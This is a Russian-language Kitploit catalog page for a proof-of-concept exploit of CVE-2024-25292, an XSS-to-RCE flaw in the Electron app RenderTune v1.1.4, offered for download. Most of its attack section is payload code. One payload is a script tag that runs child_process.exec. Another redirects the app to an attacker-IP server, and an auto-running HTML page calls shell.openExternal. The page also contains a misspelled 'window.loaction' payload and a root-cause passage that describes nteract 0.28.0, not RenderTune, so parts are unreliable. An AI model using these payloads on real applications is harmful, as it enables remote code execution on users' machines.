Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-25292 — Эксплойт XSS to RCE в RenderTune v1.1.4 | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2024-25292
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

Эксплойт XSS to RCE в RenderTune v1.1.4

Репозиторий
2111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RenderTune RCE

Подтверждение концепции для уязвимости CVE-2024-25292.

Межсайтовый скриптинг (XSS) в RenderTune v1.1.4 позволяет злоумышленникам выполнять произвольные веб-скрипты или HTML-код с помощью специально сформированной полезной нагрузки, внедряемой в параметр Upload Title. В этом репозитории представлены пример уязвимого приложения и эксплойт подтверждения концепции (POC) для него.

В качестве PoC прилагается Python-файл, который автоматизирует этот процесс.

1. Обзор уязвимости:

Это уязвимость, которая позволяет выполнить RCE через XSS. В заголовке есть часть, допускающая XSS, поэтому данная уязвимость позволяет выполнить RCE через синтаксис NodeJS посредством синтаксиса XSS.


2. Причина уязвимости:

  • nteract 0.28.0 позволяет Electron webview через Markdown-ссылку, что приводит к удалённому выполнению кода (поскольку nodeIntegration в webPreferences имеет значение true).
  • Пояснение эксплойта
    • При создании ссылок через Markdown внутри приложения оно формирует WebView через Electron, позволяя внешний доступ к ссылке. В результате злоумышленник может добиться удалённого выполнения кода (RCE), перейдя по ссылке, ведущей на сервер злоумышленника.

Подтверждение концепции (POC)

Случай 1) XSS до RCE.

Шаг 1) Подтвердите, что XSS происходит в части заголовка ※ При этом элемент Upload не будет зарегистрирован, если не прикреплено изображение

root@kitploit:~
<b>jruru</b>

1

Шаг 2) Поэтому он настроен на использование XSS для выполнения системных команд NodeJS.

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

Случай 2) Атаки через сервер злоумышленника

※ При попытке атаки с использованием window.location вы автоматически переходите на заданную страницу при каждом запуске приложения.

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

Примечание: ※ Если вы хотите быстро проверить это, создайте сервер на ПК злоумышленника с помощью следующего кода.

root@kitploit:~
$ python -m http.server 80
  • Код PoC
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


Скачать инструмент